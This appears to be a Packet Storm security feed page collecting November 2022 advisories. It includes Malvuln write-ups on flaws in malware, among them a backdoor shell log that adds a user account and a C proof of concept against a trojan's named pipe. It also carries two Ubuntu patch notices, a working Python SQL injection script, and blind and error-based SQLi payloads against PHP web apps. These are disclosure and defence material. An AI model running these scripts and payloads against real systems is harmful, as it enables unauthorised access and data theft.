Backdoor.Win32.Autocrat.b malware suffers from a weak hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.Autocrat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: AutocratType: PE32MD5: 4262a8b52b902aa2e6bf02a156d1b8d4Vuln ID: MVID-2022-0660Dropped files: srvsupp.exeDisclosure: 11/24/2022Exploit/PoC:C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536Login:autocratWinShell v5.0 (C)2002 janker.org? for helpCMD>?i Installr Removep Pathb reBootd shutDowns Shellx eXitq QuitDownload:CMD>http://.../srv.exe? for helpCMD>sMicrosoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user apparitionsec 666 /addnet user apparitionsec 666 /addThe command completed successfully.C:\Users\Victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential

Ubuntu Security Notice 5742-1 - It was discovered that JBIG-KIT incorrectly handled decoding certain large image files. If a user or automated system using JBIG-KIT were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5742-1  
November 24, 2022

jbigkit vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

JBIG-KIT could be made to crash if it opened a specially crafted file.

Software Description:  
- jbigkit: JBIG1 data compression library

Details:

It was discovered that JBIG-KIT incorrectly handled decoding certain large  
image files. If a user or automated system using JBIG-KIT were tricked into  
opening a specially crafted file, an attacker could possibly use this issue  
to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   jbigkit-bin                     2.1-3.1ubuntu0.22.10.1  
   libjbig0                        2.1-3.1ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.22.04.1  
   libjbig0                        2.1-3.1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.20.04.1  
   libjbig0                        2.1-3.1ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.18.04.1  
   libjbig0                        2.1-3.1ubuntu0.18.04.1

Ubuntu 16.04 ESM:  
   jbigkit-bin                     2.1-3.1ubuntu0.1~esm1  
   libjbig0                        2.1-3.1ubuntu0.1~esm1

Ubuntu 14.04 ESM:  
   jbigkit-bin                     2.0-2ubuntu4.1+esm1  
   libjbig0                        2.0-2ubuntu4.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5742-1  
   CVE-2017-9937

Package Information:  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.20.04.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.18.04.1

Ubuntu Security Notice USN-5742-1

Win32.Ransom.Conti ransomware fails to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/99e55ce93392068c970384ab24a0e13d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Win32.Ransom.ContiVulnerability: Crypto Logic FlawDescription: Conti ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample, others variants are unknown as they were not yet tested.E.g. Test.exe.docxTest.exe.pdfTested successfully in a virtual machine environment.Family: ContiType: PE32MD5: 99e55ce93392068c970384ab24a0e13dVuln ID: MVID-2022-0662Disclosure: 11/25/2022Video PoC URL:https://www.youtube.com/watch?v=rjxCII_e6xQExploit/PoC:Create files with ".exe" within the filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Win32.Ransom.Conti MVID-2022-0662 Cryptography Logic Flaw

Trojan.Win32.DarkNeuron.gen malware creates an IPC pipe with a NULL DACL allowing RW for the Everyone user.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Trojan.Win32.DarkNeuron.genVulnerability: Named Pipe Null DACLFamily: DarkNeuron (Turla Group)Type: PE32MD5: d891c9374ccb2a4cae2274170e8644d8Vuln ID: MVID-2022-0661Disclosure: 11/24/2022Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.\\.\Pipe\Winsock2\baseapi_http  RW Everyone  RW BUILTIN\AdministratorsLocal low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.Exploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exeMD5: d891c9374ccb2a4cae2274170e8644d8NamedPipe Exploit Deny Access to EveryoneBy Malvuln Nov of 2022**/#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http"int main(void){  HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);  PACL pOldDACL = NULL;  PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){       printf("%d", GetLastError());   return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){    printf("%d", GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){      printf("%d", GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("%d", GetLastError());     return 1;           }else{        printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");        printf("By Malvuln\n");        printf("Nov of 2022\n");      }      LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);    system("pause");return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.DarkNeuron.gen MVID-2022-0661 Named Pipe NULL DACL

Ubuntu Security Notice 5741-1 - It was discovered that Exim incorrectly handled certain regular expressions. An attacker could use this issue to cause Exim to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5741-1  
November 24, 2022

exim4 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Exim could be made to crash or run programs if it processed specially  
crafted regular expressions.

Software Description:  
- exim4: Exim is a mail transport agent

Details:

It was discovered that Exim incorrectly handled certain regular  
expressions. An attacker could use this issue to cause Exim to crash,  
resulting in a denial of service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   exim4-base                      4.96-3ubuntu1.1  
   exim4-daemon-heavy              4.96-3ubuntu1.1  
   exim4-daemon-light              4.96-3ubuntu1.1

Ubuntu 22.04 LTS:  
   exim4-base                      4.95-4ubuntu2.2  
   exim4-daemon-heavy              4.95-4ubuntu2.2  
   exim4-daemon-light              4.95-4ubuntu2.2

Ubuntu 20.04 LTS:  
   exim4-base                      4.93-13ubuntu1.7  
   exim4-daemon-heavy              4.93-13ubuntu1.7  
   exim4-daemon-light              4.93-13ubuntu1.7

Ubuntu 18.04 LTS:  
   exim4-base                      4.90.1-1ubuntu1.10  
   exim4-daemon-heavy              4.90.1-1ubuntu1.10  
   exim4-daemon-light              4.90.1-1ubuntu1.10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5741-1  
   CVE-2022-3559

Package Information:  
   https://launchpad.net/ubuntu/+source/exim4/4.96-3ubuntu1.1  
   https://launchpad.net/ubuntu/+source/exim4/4.95-4ubuntu2.2  
   https://launchpad.net/ubuntu/+source/exim4/4.93-13ubuntu1.7  
   https://launchpad.net/ubuntu/+source/exim4/4.90.1-1ubuntu1.10

Ubuntu Security Notice USN-5741-1

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Helmet Store Showroom 1.0 SQL Injection

Sanitization Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi## Author: nu11secur1ty## Date: 11.25.2022## Vendor: https://github.com/oretnom23,https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The attacker can get all information from this system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQLParameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/rnfvjf)## Time spent`00:30:00`

Sanitization Management System 1.0 SQL Injection

Chrome suffers from a heap use-after-free vulnerability in blink::LocalFrameView::PerformLayout due to an incomplete fix for CVE-2022-3199.

Chrome blink::LocalFrameView::PerformLayout Use-After-Free

XNU suffers from a vm_object use-after-free vulnerability due to invalid error handling in vm_map_enter.

XNU vm_object Use-After-Free

XNU suffers from a dangling PTE entry due to integer truncation when collapsing vm_object shadow chains.

Source

Packet Storm